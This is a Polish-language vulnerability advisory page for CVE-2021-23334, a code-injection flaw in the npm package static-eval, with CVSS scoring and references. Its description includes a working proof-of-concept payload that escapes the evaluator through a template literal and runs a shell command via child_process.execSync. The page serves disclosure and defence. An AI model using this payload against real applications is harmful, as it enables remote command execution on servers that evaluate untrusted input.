Podatność CVE-2021-23334


Publikacja: 2021-02-11

Opis:
All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast)

Typ:

CWE-94

(Improper Control of Generation of Code ('Code Injection'))

CVSS2 => (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Ogólna skala CVSS
Znaczenie
Łatwość wykorzystania
7.5/10
6.4/10
10/10
Wymagany dostęp
Złożoność ataku
Autoryzacja
Zdalny
Niska
Nie wymagana
Wpływ na poufność
Wpływ na integralność
Wpływ na dostępność
Częściowy
Częściowy
Częściowy
Affected software
Static-eval project -> Static-eval 

 Referencje:
https://github.com/browserify/static-eval/blob/master/index.js%23L180
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860
https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765

Copyright 2024, cxsecurity.com

 

Back to Top